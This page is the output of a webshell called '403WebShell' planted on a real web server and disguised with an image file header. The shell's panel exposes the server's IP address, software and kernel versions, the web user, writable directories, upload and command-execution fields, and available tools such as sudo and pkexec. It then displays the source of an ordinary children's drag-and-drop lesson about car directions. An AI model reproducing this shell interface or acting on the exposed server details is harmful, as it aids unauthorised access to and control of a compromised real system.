????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.133.59.209
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelD/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old6/Html/LevelD/Category2/LevelDCat2Lesson08.html
<!DOCTYPE html>
<html>
    <head>
        <title>Directions for the cars</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        
        <style type="text/css"></style>
        
        <script>
            function page_preLoad()
            {
                shared_setDeviceTypeLevelCategoryLastLesson(Level.D, Category.No2);
                
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.D, Category.No2, 8), true, true);
                shared_setFooterTable('id_tblFooter', true, true, false, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_boxes = ['id_dropBox_no3_1', 'id_dropBox_no2_or_3_1', 'id_dropBox_no2_or_3_2', 'id_dropBox_no4', 'id_dropBox_no8', 'id_dropBox_no10', 'id_dropBox_no2', 'id_dropBox_wordRight', 'id_dropBox_wordLeft', 'id_dropBox_word_left_or_right_1', 'id_dropBox_word_left_or_right_2'];
                var ids_options = ['id_td_no2_1', 'id_td_no2_2', 'id_td_no3_1', 'id_td_no3_2', 'id_td_no4', 'id_td_no10', 'id_td_no8', 'id_td_wordLeft1', 'id_td_wordRight1', 'id_td_wordRight2', 'id_td_wordLeft2'];
                var ids_spans = ['id_span_no2_1', 'id_span_no2_2', 'id_span_no3_1', 'id_span_no3_2', 'id_span_no4', 'id_span_no10', 'id_span_no8', 'id_span_wordLeft1', 'id_span_wordRight1', 'id_span_wordRight2', 'id_span_wordLeft2'];
                var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7'];
                var ids_All = ids_headings.concat(ids_boxes, ids_texts);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
                shared_adjust_fontSize_for_ids_all_devices(ids_options, 80);
                
                shared_hideAllExceptFirstElement('id_span_no2_', 2);
                shared_hideAllExceptFirstElement('id_span_no3_', 2);
                shared_hideAllExceptFirstElement('id_span_wordLeft', 2);
                shared_hideAllExceptFirstElement('id_span_wordRight', 2);
                shared_set_all_draggble_to_false_except_first_element('id_td_no2_', 2);
                shared_set_all_draggble_to_false_except_first_element('id_td_no3_', 2);
                shared_set_all_draggble_to_false_except_first_element('id_td_wordLeft', 2);
                shared_set_all_draggble_to_false_except_first_element('id_td_wordRight', 2);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                shared_init_dropping_spans(ids_spans);
            }
        
        function page_onLoad()
        {
            
        }
        
        function btnPrevious_click()
        {
            window.location = 'LevelDCat2Lesson07.html';
        }
        
        function btnNext_click()
        {
            window.location = 'LevelDCat2Lesson09.html';
        }
        
        function btnHome_click()
        {
            shared_btnHomeCategories_click('LevelD');
        }
        
        function DragDrop(id_dropBox, ids_array)
        {
            var eCurrentDropping = document.getElementById(shared_currentDropingId);
            
            if (((id_dropBox == 'id_dropBox_word_left_or_right_1') ||
                 (id_dropBox == 'id_dropBox_word_left_or_right_2') ||
                 (id_dropBox == 'id_dropBox_no2_or_3_1') ||
                 (id_dropBox == 'id_dropBox_no2_or_3_2')) &&
                ((shared_currentDropingId == 'id_span_no2_1') ||
                 (shared_currentDropingId == 'id_span_no2_2') ||
                 (shared_currentDropingId == 'id_span_no3_1') ||
                 (shared_currentDropingId == 'id_span_no3_2') ||
                 (shared_currentDropingId == 'id_span_wordLeft1') ||
                 (shared_currentDropingId == 'id_span_wordRight1') ||
                 (shared_currentDropingId == 'id_span_wordRight2') ||
                 (shared_currentDropingId == 'id_span_wordLeft2')))
                 {
                     set_dropBox_background_to_green(id_dropBox, eCurrentDropping);
                 }
                 else if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                 {
                     shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                     
                     unhide_next_elements(eCurrentDropping);
                     
                     isAllInfosMovedShowClapsAnimation();
                     
                     shared_set_currentDropingId_draggbleToFalse();
                 }
                 else
                 {
                     shared_resetCurrentDroppingPosition(id_dropBox);
                 }
        }
        
        function set_dropBox_background_to_green(id_dropBox, eCurrentDropping)
        {
            var eDropBoxLeftOrRight_1 = document.getElementById('id_dropBox_word_left_or_right_1');
            var eDropBoxLeftOrRight_2 = document.getElementById('id_dropBox_word_left_or_right_2');
            var eDropBoxNo2Or3_1 = document.getElementById('id_dropBox_no2_or_3_1');
            var eDropBoxNo2Or3_2 = document.getElementById('id_dropBox_no2_or_3_2');
            var isAccept = false;
            
            if (id_dropBox == 'id_dropBox_no2_or_3_1')
            {
                if (((shared_currentDropingId == 'id_span_no2_1') ||
                     (shared_currentDropingId == 'id_span_no2_2') ||
                     (shared_currentDropingId == 'id_span_no3_1') ||
                     (shared_currentDropingId == 'id_span_no3_2')))
                     {
                        if ((eDropBoxNo2Or3_1.isFilled == false))
                        {
                            if ((eDropBoxNo2Or3_2.isFilled == false) && (eDropBoxLeftOrRight_1.isFilled == false) && (eDropBoxLeftOrRight_2.isFilled == false))
                            {
                                isAccept = true;
                            }
                            else if ((eDropBoxNo2Or3_2.isFilled == false) && (eDropBoxLeftOrRight_1.isFilled == true))
                            {
                                if (eCurrentDropping.innerText == '3')
                                {
                                    isAccept = (eDropBoxLeftOrRight_1.innerText == 'left');
                                }
                                else if (eCurrentDropping.innerText == '2')
                                {
                                    isAccept = (eDropBoxLeftOrRight_1.innerText == 'right');
                                }
                            }
                            else if ((eDropBoxNo2Or3_2.isFilled == false) && (eDropBoxLeftOrRight_1.isFilled == false) && (eDropBoxLeftOrRight_2.isFilled == true))
                            {
                                if ((eCurrentDropping.innerText == '3') && (eDropBoxLeftOrRight_2.innerText == 'right'))
                                {
                                    isAccept = true;
                                }
                                else if ((eCurrentDropping.innerText == '2') && (eDropBoxLeftOrRight_2.innerText == 'left'))
                                {
                                    isAccept = true;
                                }
                            }
                            else if (eDropBoxNo2Or3_2.isFilled == true)
                            {
                                if (eDropBoxNo2Or3_2.innerText == '3')
                                {
                                    isAccept = (eCurrentDropping.innerText == '2');
                                }
                                else if (eDropBoxNo2Or3_2.innerText == '2')
                                {
                                    isAccept = (eCurrentDropping.innerText == '3');
                                }
                            }
                            
                            if (isAccept)
                            {
                                shared_setTextAndBackgroundColorToGreenAndIsMovedTrueAndIsFilledTrue(shared_currentDropingId, id_dropBox);
                            }
                            else
                            {
                                shared_resetCurrentDroppingPosition(id_dropBox);
                            }
                            
                            unhide_next_elements(eCurrentDropping);
                        }
                        else
                        {
                            shared_resetCurrentDroppingPosition(id_dropBox);
                        }
                     }
                     else
                     {
                         shared_resetCurrentDroppingPosition(id_dropBox);
                     }
            }
            else if (id_dropBox == 'id_dropBox_no2_or_3_2')
            {
                if (((shared_currentDropingId == 'id_span_no2_1') ||
                     (shared_currentDropingId == 'id_span_no2_2') ||
                     (shared_currentDropingId == 'id_span_no3_1') ||
                     (shared_currentDropingId == 'id_span_no3_2')))
                     {
                         if ((eDropBoxNo2Or3_2.isFilled == false))
                         {
                             if ((eDropBoxNo2Or3_1.isFilled == false) && (eDropBoxLeftOrRight_1.isFilled == false) && (eDropBoxLeftOrRight_2.isFilled == false))
                             {
                                 isAccept = true;
                             }
                             else if ((eDropBoxNo2Or3_1.isFilled == false) && (eDropBoxLeftOrRight_2.isFilled == true))
                             {
                                 if (eCurrentDropping.innerText == '3')
                                 {
                                     isAccept = (eDropBoxLeftOrRight_2.innerText == 'left');
                                 }
                                 else if (eCurrentDropping.innerText == '2')
                                 {
                                     isAccept = (eDropBoxLeftOrRight_2.innerText == 'right');
                                 }
                             }
                             else if ((eDropBoxNo2Or3_1.isFilled == false) && (eDropBoxLeftOrRight_2.isFilled == false) && (eDropBoxLeftOrRight_1.isFilled == true))
                             {
                                 if ((eCurrentDropping.innerText == '3') && (eDropBoxLeftOrRight_1.innerText == 'right'))
                                 {
                                     isAccept = true;
                                 }
                                 else if ((eCurrentDropping.innerText == '2') && (eDropBoxLeftOrRight_1.innerText == 'left'))
                                 {
                                     isAccept = true;
                                 }
                             }
                             else if (eDropBoxNo2Or3_1.isFilled == true)
                             {
                                 if (eDropBoxNo2Or3_1.innerText == '3')
                                 {
                                     isAccept = (eCurrentDropping.innerText == '2');
                                 }
                                 else if (eDropBoxNo2Or3_1.innerText == '2')
                                 {
                                     isAccept = (eCurrentDropping.innerText == '3');
                                 }
                             }
                             
                             if (isAccept)
                             {
                                 shared_setTextAndBackgroundColorToGreenAndIsMovedTrueAndIsFilledTrue(shared_currentDropingId, id_dropBox);
                             }
                             else
                             {
                                 shared_resetCurrentDroppingPosition(id_dropBox);
                             }
                             
                             unhide_next_elements(eCurrentDropping);
                         }
                         else
                         {
                             shared_resetCurrentDroppingPosition(id_dropBox);
                         }
                     }
                     else
                     {
                         shared_resetCurrentDroppingPosition(id_dropBox);
                     }
            }
            else if (id_dropBox == 'id_dropBox_word_left_or_right_1')
            {
                if (((shared_currentDropingId == 'id_span_wordLeft1') ||
                     (shared_currentDropingId == 'id_span_wordRight1') ||
                     (shared_currentDropingId == 'id_span_wordRight2') ||
                     (shared_currentDropingId == 'id_span_wordLeft2')))
                     {
                         if ((eDropBoxLeftOrRight_1.isFilled == false))
                         {
                             if ((eDropBoxLeftOrRight_2.isFilled == false) && (eDropBoxNo2Or3_1.isFilled == false) && (eDropBoxNo2Or3_2.isFilled == false))
                             {
                                 isAccept = true;
                             }
                             else if ((eDropBoxLeftOrRight_2.isFilled == false) && (eDropBoxNo2Or3_1.isFilled == true))
                             {
                                 if (eCurrentDropping.innerText == 'left')
                                 {
                                     isAccept = (eDropBoxNo2Or3_1.innerText == '3');
                                 }
                                 else if (eCurrentDropping.innerText == 'right')
                                 {
                                     isAccept = (eDropBoxNo2Or3_1.innerText == '2');
                                 }
                             }
                             else if ((eDropBoxLeftOrRight_2.isFilled == false) && (eDropBoxNo2Or3_1.isFilled == false) && (eDropBoxNo2Or3_2.isFilled == true))
                             {
                                 if ((eCurrentDropping.innerText == 'right') && (eDropBoxNo2Or3_2.innerText == '3'))
                                 {
                                     isAccept = true;
                                 }
                                 else if ((eCurrentDropping.innerText == 'left') && (eDropBoxNo2Or3_2.innerText == '2'))
                                 {
                                     isAccept = true;
                                 }
                             }
                             else if (eDropBoxLeftOrRight_2.isFilled == true)
                             {
                                 if (eDropBoxLeftOrRight_2.innerText == 'right')
                                 {
                                     isAccept = (eCurrentDropping.innerText == 'left');
                                 }
                                 else if (eDropBoxLeftOrRight_2.innerText == 'left')
                                 {
                                     isAccept = (eCurrentDropping.innerText == 'right');
                                 }
                             }
                             
                             if (isAccept)
                             {
                                 shared_setTextAndBackgroundColorToGreenAndIsMovedTrueAndIsFilledTrue(shared_currentDropingId, id_dropBox);
                             }
                             else
                             {
                                 shared_resetCurrentDroppingPosition(id_dropBox);
                             }
                             
                             unhide_next_elements(eCurrentDropping);
                         }
                         else
                         {
                             shared_resetCurrentDroppingPosition(id_dropBox);
                         }
                     }
                     else
                     {
                         shared_resetCurrentDroppingPosition(id_dropBox);
                     }
            }
            else if (id_dropBox == 'id_dropBox_word_left_or_right_2')
            {
                if (((shared_currentDropingId == 'id_span_wordLeft1') ||
                     (shared_currentDropingId == 'id_span_wordRight1') ||
                     (shared_currentDropingId == 'id_span_wordRight2') ||
                     (shared_currentDropingId == 'id_span_wordLeft2')))
                     {
                         if ((eDropBoxLeftOrRight_2.isFilled == false))
                         {
                             if ((eDropBoxLeftOrRight_1.isFilled == false) && (eDropBoxNo2Or3_2.isFilled == false) && (eDropBoxNo2Or3_1.isFilled == false))
                             {
                                 isAccept = true;
                             }
                             else if ((eDropBoxLeftOrRight_1.isFilled == false) && (eDropBoxNo2Or3_2.isFilled == true))
                             {
                                 if (eCurrentDropping.innerText == 'left')
                                 {
                                     isAccept = (eDropBoxNo2Or3_2.innerText == '3');
                                 }
                                 else if (eCurrentDropping.innerText == 'right')
                                 {
                                     isAccept = (eDropBoxNo2Or3_2.innerText == '2');
                                 }
                             }
                             else if ((eDropBoxLeftOrRight_1.isFilled == false) && (eDropBoxNo2Or3_2.isFilled == false) && (eDropBoxNo2Or3_1.isFilled == true))
                             {
                                 if ((eCurrentDropping.innerText == 'right') && (eDropBoxNo2Or3_1.innerText == '3'))
                                 {
                                     isAccept = true;
                                 }
                                 else if ((eCurrentDropping.innerText == 'left') && (eDropBoxNo2Or3_1.innerText == '2'))
                                 {
                                     isAccept = true;
                                 }
                             }
                             else if (eDropBoxLeftOrRight_1.isFilled == true)
                             {
                                 if (eDropBoxLeftOrRight_1.innerText == 'right')
                                 {
                                     isAccept = (eCurrentDropping.innerText == 'left');
                                 }
                                 else if (eDropBoxLeftOrRight_1.innerText == 'left')
                                 {
                                     isAccept = (eCurrentDropping.innerText == 'right');
                                 }
                             }
                             
                             if (isAccept)
                             {
                                 shared_setTextAndBackgroundColorToGreenAndIsMovedTrueAndIsFilledTrue(shared_currentDropingId, id_dropBox);
                             }
                             else
                             {
                                 shared_resetCurrentDroppingPosition(id_dropBox);
                             }
                             
                             unhide_next_elements(eCurrentDropping);
                         }
                         else
                         {
                             shared_resetCurrentDroppingPosition(id_dropBox);
                         }
                     }
                     else
                     {
                         shared_resetCurrentDroppingPosition(id_dropBox);
                     }
            }
        }
        
        function unhide_next_elements(eCurrentDropping)
        {
            if (eCurrentDropping.innerText == '2')
            {
                shared_unHideNextElementNew2('id_span_no2_', 'id_td_no2_', 2);
            }
            else if (eCurrentDropping.innerText == '3')
            {
                shared_unHideNextElementNew2('id_span_no3_', 'id_td_no3_', 2);
            }
            else if (eCurrentDropping.innerText == 'right')
            {
                shared_unHideNextElementNew2('id_span_wordRight', 'id_td_wordRight', 2);
            }
            else if (eCurrentDropping.innerText == 'left')
            {
                shared_unHideNextElementNew2('id_span_wordLeft', 'id_td_wordLeft', 2);
            }
        }
        
        function isAllInfosMovedShowClapsAnimation()
        {
            var ids_boxes = ['id_dropBox_no3_1', 'id_dropBox_no2_or_3_1', 'id_dropBox_no2_or_3_2', 'id_dropBox_no4', 'id_dropBox_no8', 'id_dropBox_no10', 'id_dropBox_no2', 'id_dropBox_wordRight', 'id_dropBox_wordLeft', 'id_dropBox_word_left_or_right_1', 'id_dropBox_word_left_or_right_2'];
            
            shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
        }
        </script>
    </head>
    
    <body onload="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                    <tr height="5%">
                                        <td id="id_td_heading1" class="shared_style_black_24px_bold_padding_left_2_percent">Drag left or right directions for the <span style="color:red">cars</span>:
                                        </td>
                                    </tr>
                                    <tr height="10%">
                                        <td align="center" style="border-top: 0px">
                                            <img src="../../../img/LevelD/Category2/LevelDCat2Lesson08/leftRight.png" width="25%" draggable="false">
                                                </td>
                                    </tr>
                                    <tr height="10%">
                                        <td style="border-top: 0px">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr height="50%">
                                                    <td id="id_td_heading2" class="shared_style_blue_24px_bold_padding_left_2_percent" width="*">Options:</td>
                                                    <td id="id_td_no2_1" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                        <span id="id_span_no2_1">2</span>
                                                    </td>
                                                    <td id="id_td_no3_1" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                        <span id="id_span_no3_1">3</span>
                                                    </td>
                                                    <td id="id_td_no4" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                        <span id="id_span_no4">4</span>
                                                    </td>
                                                    <td id="id_td_no8" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                        <span id="id_span_no8">8</span>
                                                    </td>
                                                    <td id="id_td_no2_2" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                        <span id="id_span_no2_2">2</span>
                                                    </td>
                                                    <td id="id_td_no3_2" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                        <span id="id_span_no3_2">3</span>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <td id="id_td_no10" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                            <span id="id_span_no10">10</span>
                                                        </td>
                                                        <td id="id_td_wordLeft1" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                            <span id="id_span_wordLeft1">left</span>
                                                        </td>
                                                        <td id="id_td_wordRight1" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                            <span id="id_span_wordRight1">right</span>
                                                        </td>
                                                        
                                                        <td id="id_td_wordRight2" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                            <span id="id_span_wordRight2">right</span>
                                                        </td>
                                                        <td id="id_td_wordLeft2" class="shared_style_red_24px_bold" width="14%" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                            <span id="id_span_wordLeft2">left</span>
                                                        </td>
                                                        <td>&nbsp;</td>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td>
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr height="16%">
                                                    <td width="30%" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson08/cars3.png" width="45%" draggable="false">
                                                            </td>
                                                    <td width="*">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="*">
                                                                <td></td>
                                                            </tr>
                                                            <tr height="33%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="33%">
                                                                            <td id="id_dropBox_no3_1" class="shared_style_red_24px_bold" width="10%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_no3_1'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_no3_1')"
                                                                                ondrop="DragDrop('id_dropBox_no3_1', ['id_span_no3_1', 'id_span_no3_2'])">___</td>
                                                                            <td id="id_td_text1" class="shared_style_black_24px_bold" width="*" align="center"><span style="color:red">car</span>s are travelling towards</td>
                                                                            <td id="id_dropBox_wordRight" class="shared_style_red_24px_bold" width="15%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_wordRight'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_wordRight')"
                                                                                ondrop="DragDrop('id_dropBox_wordRight', ['id_span_wordRight1', 'id_span_wordRight2'])">___</td>
                                                                            <td width="2%"></td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="33%">
                                                                <td></td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="18%">
                                                    <td width="30%" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson08/cars4.png" width="70%" draggable="false">
                                                            </td>
                                                    <td width="*">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="*">
                                                                <td></td>
                                                            </tr>
                                                            <tr height="33%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="33%">
                                                                            <td id="id_dropBox_no4" class="shared_style_red_24px_bold" width="10%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_no4'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_no4')"
                                                                                ondrop="DragDrop('id_dropBox_no4', ['id_span_no4'])">___</td>
                                                                            <td id="id_td_text2" class="shared_style_black_24px_bold" width="*" align="center"><span style="color:red">car</span>s are travelling towards</td>
                                                                            <td id="id_dropBox_wordLeft" class="shared_style_red_24px_bold" width="15%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_wordLeft'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_wordLeft')"
                                                                                ondrop="DragDrop('id_dropBox_wordLeft', ['id_span_wordLeft1', 'id_span_wordLeft2'])">___</td>
                                                                            <td width="2%"></td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="45%">
                                                                <td></td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="25%">
                                                    <td width="30%" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson08/cars5.png" width="60%" draggable="false">
                                                            </td>
                                                    <td width="*">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="2%">
                                                                <td></td>
                                                            </tr>
                                                            <tr height="33%">
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="33%">
                                                                            <td id="id_dropBox_no2_or_3_1" class="shared_style_red_24px_bold" width="10%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_no2_or_3_1'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_no2_or_3_1')"
                                                                                ondrop="DragDrop('id_dropBox_no2_or_3_1', ['id_span_no2_1', 'id_span_no2_2', 'id_span_no3_1', 'id_span_no3_2'])">___
                                                                            </td>
                                                                            <td id="id_td_text3" class="shared_style_black_24px_bold" width="*" align="center"><span style="color:red">car</span>s are travelling towards
                                                                            </td>
                                                                            <td id="id_dropBox_word_left_or_right_1" class="shared_style_red_24px_bold" width="15%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_word_left_or_right_1'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_word_left_or_right_1')"
                                                                                ondrop="DragDrop('id_dropBox_word_left_or_right_1', ['id_span_wordRight1', 'id_span_wordRight2', 'id_span_wordLeft2', 'id_span_wordLeft1'])">___
                                                                            </td>
                                                                            <td width="2%"></td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="33%">
                                                                <td style="padding-top:1%">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="33%">
                                                                            <td id="id_dropBox_no2_or_3_2" class="shared_style_red_24px_bold" width="10%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_no2_or_3_2'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_no2_or_3_2')"
                                                                                ondrop="DragDrop('id_dropBox_no2_or_3_2', ['id_span_no2_1', 'id_span_no2_2', 'id_span_no3_1', 'id_span_no3_2'])">___</td>
                                                                            <td id="id_td_text4" class="shared_style_black_24px_bold" width="*" align="center"><span style="color:red">car</span>s are travelling towards</td>
                                                                            <td id="id_dropBox_word_left_or_right_2" class="shared_style_red_24px_bold" width="15%" align="center"
                                                                                ondragover="shared_highlight('id_dropBox_word_left_or_right_2'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight('id_dropBox_word_left_or_right_2')"
                                                                                ondrop="DragDrop('id_dropBox_word_left_or_right_2', ['id_span_wordRight1', 'id_span_wordRight2', 'id_span_wordLeft2', 'id_span_wordLeft1'])">___</td>
                                                                            <td width="2%"></td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td></td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td width="30%" align="center">
                                                        <img src="../../../img/LevelD/Category2/LevelDCat2Lesson08/cars10.png" width="80%" draggable="false">
                                                            </td>
                                                    <td width="*">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr id="id_tr_no10" height="33%"
                                                                ondragover="shared_highlight('id_dropBox_no10'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_no10')"
                                                                ondrop="DragDrop('id_dropBox_no10', ['id_span_no10'])">
                                                                <td style="padding-top:1%">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="33%">
                                                                            <td id="id_td_text5" class="shared_style_black_24px_bold" width="*" align="left">How many <span style="color:red">car</span>s are there?</td>
                                                                            <td id="id_dropBox_no10" class="shared_style_red_24px_bold" width="15%" align="center">___</td>
                                                                            <td width="2%"></td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_no8" height="33%"
                                                                ondragover="shared_highlight('id_dropBox_no8'); shared_allowDrop_web(event)"
                                                                ondragleave="shared_un_highlight('id_dropBox_no8')"
                                                                ondrop="DragDrop('id_dropBox_no8', ['id_span_no8'])">
                                                                <td style="padding-top:1%">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="33%">
                                                                            <td id="id_td_text6" class="shared_style_black_24px_bold" width="*" align="left">How many <span style="color:red">car</span>s are travelling towards left?</td>
                                                                            <td id="id_dropBox_no8" class="shared_style_red_24px_bold" width="15%" align="center">___</td>
                                                                            <td width="2%"></td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr id="id_tr_no2" height="*">
                                                                <td style="padding-top:1%; padding-bottom:1%"
                                                                    ondragover="shared_highlight('id_dropBox_no2'); shared_allowDrop_web(event)"
                                                                    ondragleave="shared_un_highlight('id_dropBox_no2')"
                                                                    ondrop="DragDrop('id_dropBox_no2', ['id_span_no2_1', 'id_span_no2_2'])">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr height="33%">
                                                                            <td id="id_td_text7" class="shared_style_black_24px_bold" width="*" align="left">How many <span style="color:red">car</span>s are travelling towards right?</td>
                                                                            <td id="id_dropBox_no2" class="shared_style_red_24px_bold" width="15%" align="center">___</td>
                                                                            <td width="2%"></td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_no2_1', {handle : 'id_td_no2_1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no2_2', {handle : 'id_td_no2_2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no3_1', {handle : 'id_td_no3_1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no3_2', {handle : 'id_td_no3_2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no4', {handle : 'id_td_no4', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no8', {handle : 'id_td_no8', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no10', {handle : 'id_td_no10', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_wordLeft1', {handle : 'id_td_wordLeft1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_wordRight1', {handle : 'id_td_wordRight1', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_wordRight2', {handle : 'id_td_wordRight2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_wordLeft2', {handle : 'id_td_wordLeft2', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_dropBox_no3_1', {onOver : function(){shared_highlight('id_dropBox_no3_1')}, onOut : function(){shared_un_highlight('id_dropBox_no3_1')}, onDrop : function(){DragDrop('id_dropBox_no3_1', ['id_span_no3_1', 'id_span_no3_2'])}});
